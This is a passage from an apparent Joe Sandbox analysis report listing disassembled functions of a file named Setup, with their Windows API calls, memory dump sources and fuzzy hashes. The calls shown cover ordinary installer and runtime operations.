                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: exiting function/method
                                                                                              • API String ID: 431132790-2452647166
                                                                                              • Opcode ID: 393651330c407160ceae5cfdda2ad0fc930f0a8b5b45c360640d4f9603247c5b
                                                                                              • Instruction ID: 1866c6c09129283558223d058b6fe8eba1df96bc29f042fdbb4a3e1c625daed3
                                                                                              • Opcode Fuzzy Hash: 393651330c407160ceae5cfdda2ad0fc930f0a8b5b45c360640d4f9603247c5b
                                                                                              • Instruction Fuzzy Hash: 9FE0E5352106019FD710DFA8C159B89B7A2FF68315F108498E6958FBA4CB35EC24DB51
                                                                                              Function 6C8E736E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000424,6C8E772B,?,?,?,?,00000001), ref: 6C8E739A
                                                                                              Strings
                                                                                              • The handle to the section is Null, xrefs: 6C8E7380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID: The handle to the section is Null
                                                                                              • API String ID: 3314676101-179083574
                                                                                              • Opcode ID: ed1c81f753d23a3beeb351a506d665bfcc28719ca17a24c3a06e9cec122a305b
                                                                                              • Instruction ID: e83fd81415b8406680554feee91f1198fca2449a573b1646949745bff662d814
                                                                                              • Opcode Fuzzy Hash: ed1c81f753d23a3beeb351a506d665bfcc28719ca17a24c3a06e9cec122a305b
                                                                                              • Instruction Fuzzy Hash: 78E0BFB0784702AFE7708F699E06B057AE0AF09704F50CC19B655EAA91D671E4408B44
                                                                                              Function 639509A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNELBASE(RICHED20.DLL,?,6395CA98,00000000,00000001,?,80070057,63945D9C,?,00000030,80070057), ref: 639509C9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID: RICHED20.DLL
                                                                                              • API String ID: 1029625771-992299850
                                                                                              • Opcode ID: e772bdfde2e95b593c03a3931c4fc942a39b531f169ad9143a387f799a591c52
                                                                                              • Instruction ID: 1e44a911e35a0d24920b5961c1ce163851d64a5510bcbf2a14b6bb5080c7f458
                                                                                              • Opcode Fuzzy Hash: e772bdfde2e95b593c03a3931c4fc942a39b531f169ad9143a387f799a591c52
                                                                                              • Instruction Fuzzy Hash: C6E0FEB1905B409F87609F6BE544542FBF8BFAAA113104A1FD09AC6A25D3B0A1458F54
                                                                                              Function 6C5D3536 Relevance: 3.2, APIs: 2, Instructions: 213COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ctype.LIBCPMT ref: 6C5E2015
                                                                                              • ctype.LIBCPMT ref: 6C5E202A
                                                                                                • Part of subcall function 6C5D17EB: malloc.MSVCRT ref: 6C5D17F6
                                                                                                • Part of subcall function 6C5D2885: InitializeCriticalSectionAndSpinCount.KERNEL32(00000004,00000FA0,?,00000000,00000000), ref: 6C5D28C4
                                                                                                • Part of subcall function 6C5D3992: EnterCriticalSection.KERNEL32(?,00000000,6C5D397F,00000000,6C5D371E,80004005), ref: 6C5D39AE
                                                                                                • Part of subcall function 6C5D2C9B: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,6C5D27B0,00000000,6C5F0088), ref: 6C5D2D01
                                                                                                • Part of subcall function 6C5D2C9B: VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,6C5D27B0,00000000,6C5F0088), ref: 6C5D2D4F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocCriticalSectionVirtualctype$CountEnterInitializeSpinmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 738331480-0
                                                                                              • Opcode ID: 1791fbcc9bc8fb1bf8dbd8aefbabfc203cfcc86397cde3a3353af89b496b949a
                                                                                              • Instruction ID: abc6c4b08b699f9eb15e7ec5a48eef2ae818d32353b8874c3aba7f570fabe8ce
                                                                                              • Opcode Fuzzy Hash: 1791fbcc9bc8fb1bf8dbd8aefbabfc203cfcc86397cde3a3353af89b496b949a
                                                                                              • Instruction Fuzzy Hash: D671B030245381EBDB148F19CC84F9A3AE5BB89308F664869E525DBEA2C771E845CF54
                                                                                              Function 6C90D779 Relevance: 3.1, APIs: 2, Instructions: 144COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C90D780
                                                                                                • Part of subcall function 6C8E3096: __EH_prolog3.LIBCMT ref: 6C8E309D
                                                                                              • InitializeCriticalSection.KERNEL32(0000000C), ref: 6C90D96A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CriticalInitializeSection
                                                                                              • String ID:
                                                                                              • API String ID: 1185523453-0
                                                                                              • Opcode ID: 3fc06d3155f92bc62115b13950e359060fa565287ef26adc1e6dbb5259f1d79f
                                                                                              • Instruction ID: 289df8d8d5881603c343c804346b92288a194854773ef78b618e69a3b9ff60e9
                                                                                              • Opcode Fuzzy Hash: 3fc06d3155f92bc62115b13950e359060fa565287ef26adc1e6dbb5259f1d79f
                                                                                              • Instruction Fuzzy Hash: 42616D7560164ADFCF01CF68C584BCEBBB4BF19308F148559E958AB341C774EA19CBA1
                                                                                              Function 63952996 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395299D
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00000008,639550CF,639671D0,?,639671D0,?,?,?,00000000,63955C04,?,?), ref: 63952A79
                                                                                                • Part of subcall function 63960717: __EH_prolog3.LIBCMT ref: 6396071E
                                                                                                • Part of subcall function 63960717: __recalloc.LIBCMT ref: 63960766
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ExceptionRaise__recalloc
                                                                                              • String ID:
                                                                                              • API String ID: 3369754026-0
                                                                                              • Opcode ID: fc6a087662c84664f9662cbf346bf3d42c49e3a13e12f8b043ece5fdc617ad00
                                                                                              • Instruction ID: 87b5018859cefa88f2c132e52a40953703b86909399cd25cf920cdc4c0dbb905
                                                                                              • Opcode Fuzzy Hash: fc6a087662c84664f9662cbf346bf3d42c49e3a13e12f8b043ece5fdc617ad00
                                                                                              • Instruction Fuzzy Hash: FD31C97190060AEBDB20CF59C9C099EF7B4FF14764B68892AF96997641C330F9A1CF91
                                                                                              Function 63965CD1 Relevance: 3.1, APIs: 2, Instructions: 78windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 63965D69
                                                                                              • SendMessageW.USER32(?,-0000190B,?,?), ref: 63965D90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3015471070-0
                                                                                              • Opcode ID: 9665a9ef357b9a0e22948b7cf1b8d789f3032b32bf6639297c4d06e6ab427a3c
                                                                                              • Instruction ID: 86d92f138ff55b8a33e5ad9e02af45e81c4aa4392c17970582924e237a670c12
                                                                                              • Opcode Fuzzy Hash: 9665a9ef357b9a0e22948b7cf1b8d789f3032b32bf6639297c4d06e6ab427a3c
                                                                                              • Instruction Fuzzy Hash: 8B110833B06A046BFB201949C9FCA5E76AED783FD0F090526F915871FBD724D4818D51
                                                                                              Function 6C8D4613 Relevance: 3.1, APIs: 2, Instructions: 59registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6C91847A: RegCloseKey.ADVAPI32(?,?,?,6C8D463B,00000034,00000034,00000000), ref: 6C9184BA
                                                                                              • RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C8D42F8,6C8BA794,02F92298), ref: 6C8D468D
                                                                                              • RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C8D42F8,6C8BA794,02F92298), ref: 6C8D469E
                                                                                                • Part of subcall function 6C9183D2: RegQueryValueExW.ADVAPI32(00000000,00000034,00000000,00000034,00000034,00000000,?,?,6C8D4685,?,?,6C8D42F8,00000034,00000034,00000034,00000034), ref: 6C9183F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 2393043351-0
                                                                                              • Opcode ID: 9478c5c515b19a81a73c8d81db745c0e6e9208c3eb1d5802b651a7c5c5273550
                                                                                              • Instruction ID: 2dc5c9b1a641527ef07fedcdc0ac94ea34272d1b4aec4786355d5190d31d3a59
                                                                                              • Opcode Fuzzy Hash: 9478c5c515b19a81a73c8d81db745c0e6e9208c3eb1d5802b651a7c5c5273550
                                                                                              • Instruction Fuzzy Hash: 1D111675E00229EFCF11DF96D9048DEBB7AEF98B18B164462F811A2610D374AA15EBD0
                                                                                              Function 6C8F3114 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_catch_free
                                                                                              • String ID:
                                                                                              • API String ID: 2207867443-0
                                                                                              • Opcode ID: 3c45f6e155c628b72f30c9d99c3eb895e3272996be1f94d9606de70606ca9d81
                                                                                              • Instruction ID: 8528dbb042f974b8b7c50ca609bba552e8337c2bd9733381d01739a4a5acdee6
                                                                                              • Opcode Fuzzy Hash: 3c45f6e155c628b72f30c9d99c3eb895e3272996be1f94d9606de70606ca9d81
                                                                                              • Instruction Fuzzy Hash: B311B170A05309EFDF10CB64C6457ECB7B0AF25359F204958E474ABA81C775CA99C692
                                                                                              Function 639663D4 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6394E2E1: GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 6394E319
                                                                                                • Part of subcall function 6394E2E1: FlushInstructionCache.KERNEL32(00000000), ref: 6394E320
                                                                                              • SetLastError.KERNEL32(0000000E,00000000,?,?,639644A7,?,?,00000000,50010000,00000000,?,?,639821D0,00000020,?,00000000), ref: 639663EF
                                                                                              • CreateWindowExW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 63966456
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CacheCreateCurrentErrorFlushInstructionLastProcessWindow
                                                                                              • String ID:
                                                                                              • API String ID: 852167079-0
                                                                                              • Opcode ID: 33e87ec8f00613671ec6ee1daf450d279b82bd4a0bbf0d510f3d2f59bbd81827
                                                                                              • Instruction ID: 663a054db461fa1e44e96b36d481cecbae6aedc80ceafc1737f5de24a59a936b
                                                                                              • Opcode Fuzzy Hash: 33e87ec8f00613671ec6ee1daf450d279b82bd4a0bbf0d510f3d2f59bbd81827
                                                                                              • Instruction Fuzzy Hash: 88113C32205209AFDB019F59CC04EAB7BA9EB8AB50F058529F908DB151D735D861DFA0
                                                                                              Function 6C8F3B2B Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F3B32
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F4513: __CxxThrowException@8.LIBCMT ref: 6C8F45A2
                                                                                                • Part of subcall function 6C8C8168: GetFileSize.KERNEL32(?,?,?,?,?,6C8F3B9F,?,?,00000000,?,?,?,?,00000008,6C8FEC79,?), ref: 6C8C8178
                                                                                              • InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C8FEC79,?,?), ref: 6C8F3BC9
                                                                                                • Part of subcall function 6C8C80F7: WriteFile.KERNEL32(?,?,?,?,00000000,?,6C8F60F1), ref: 6C8C810D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileH_prolog3$CriticalException@8InitializeSectionSizeThrowWrite
                                                                                              • String ID:
                                                                                              • API String ID: 593797809-0
                                                                                              • Opcode ID: edab08114f0562f61adf0c10c8ca06effa942f36efc001b1ad2dc819d18cf797
                                                                                              • Instruction ID: 784bd40f18cb8610378787963951e88c9ee4e5b9a5d8b118ba1dee26226ba0cb
                                                                                              • Opcode Fuzzy Hash: edab08114f0562f61adf0c10c8ca06effa942f36efc001b1ad2dc819d18cf797
                                                                                              • Instruction Fuzzy Hash: 0C11D37150124AEFCB10CF98CF45BDEBBB8BF15704F008816A550A7A41C7B0EA29CBB2
                                                                                              Function 6C901315 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C90131C
                                                                                                • Part of subcall function 6C9036BA: GetUserDefaultUILanguage.KERNEL32(02F92298,?,00000000,?,?,?,?,6C901338,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498), ref: 6C9036D8
                                                                                              • _free.LIBCMT ref: 6C90137B
                                                                                                • Part of subcall function 6C90374B: __EH_prolog3.LIBCMT ref: 6C903752
                                                                                                • Part of subcall function 6C90374B: PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,6C8FFA6E,0000000C,6C903A05,?,6C8BA794,?), ref: 6C9037B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DefaultExistsFileLanguagePathUser_free
                                                                                              • String ID:
                                                                                              • API String ID: 2326855983-0
                                                                                              • Opcode ID: 299112ef528cd507b887fffcc3b71790b025ba031632da09f1ca9b239d94cb49
                                                                                              • Instruction ID: 028f1b228e7d56f49efbbad3a6bdcf8986c8baa3f26d447c4e0f646d8720b16e
                                                                                              • Opcode Fuzzy Hash: 299112ef528cd507b887fffcc3b71790b025ba031632da09f1ca9b239d94cb49
                                                                                              • Instruction Fuzzy Hash: 331109B1E0122A9BCF119FA4C8419EEBBB9AF25708F11449ED96077F00C738D546CBE1
                                                                                              Function 6C8E8CBF Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E8CC6
                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?), ref: 6C8E8D2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExistsFileH_prolog3Path
                                                                                              • String ID:
                                                                                              • API String ID: 20096932-0
                                                                                              • Opcode ID: 637881c8cb6bb6ad4e085fc1a71de8a8e7e30f2a9b75bda218334903bbecf85b
                                                                                              • Instruction ID: 240dcc139321a65bb39b39c08edf19360e2d59628a34621f8d57180c171a2776
                                                                                              • Opcode Fuzzy Hash: 637881c8cb6bb6ad4e085fc1a71de8a8e7e30f2a9b75bda218334903bbecf85b
                                                                                              • Instruction Fuzzy Hash: DA114C71600249DFDB10DFACC985ADE77A0FF25318B10896AE895CFB45DB30D914CB64
                                                                                              Function 6C8F9067 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F906E
                                                                                              • __recalloc.LIBCMT ref: 6C8F90B0
                                                                                                • Part of subcall function 6C918E8C: __CxxThrowException@8.LIBCMT ref: 6C918EA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8H_prolog3Throw__recalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2968967773-0
                                                                                              • Opcode ID: c93ec03183fc523fb6935b40fa150bb6cf838c9622a53c73e501b283f3317404
                                                                                              • Instruction ID: 364efdb9f2c4ceb0a4d69ed78a9c0aad745c6a85835ab092cb83851fc006f2a9
                                                                                              • Opcode Fuzzy Hash: c93ec03183fc523fb6935b40fa150bb6cf838c9622a53c73e501b283f3317404
                                                                                              • Instruction Fuzzy Hash: CC01C0312047019ADB309F28C68075A73E6EFE1788B658D1CC5B59BE44EB73E817C640
                                                                                              Function 63960717 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6396071E
                                                                                              • __recalloc.LIBCMT ref: 63960766
                                                                                                • Part of subcall function 639683CE: __CxxThrowException@8.LIBCMT ref: 639683E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8H_prolog3Throw__recalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2968967773-0
                                                                                              • Opcode ID: 90c90433fac4549a4a86da3a8ea59c5324f37a737f28058f8303cd97423550c1
                                                                                              • Instruction ID: eae2124c7a1bab60c45fea6e62fb33ecb538f445a96cb17836f5676b8ee800b3
                                                                                              • Opcode Fuzzy Hash: 90c90433fac4549a4a86da3a8ea59c5324f37a737f28058f8303cd97423550c1
                                                                                              • Instruction Fuzzy Hash: 6D01C4325497019AF320CE38CDC1A1E76E9EBA2F84F21882DE49E8B340EB30D441CE00
                                                                                              Function 6C918BDC Relevance: 3.1, APIs: 2, Instructions: 51COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
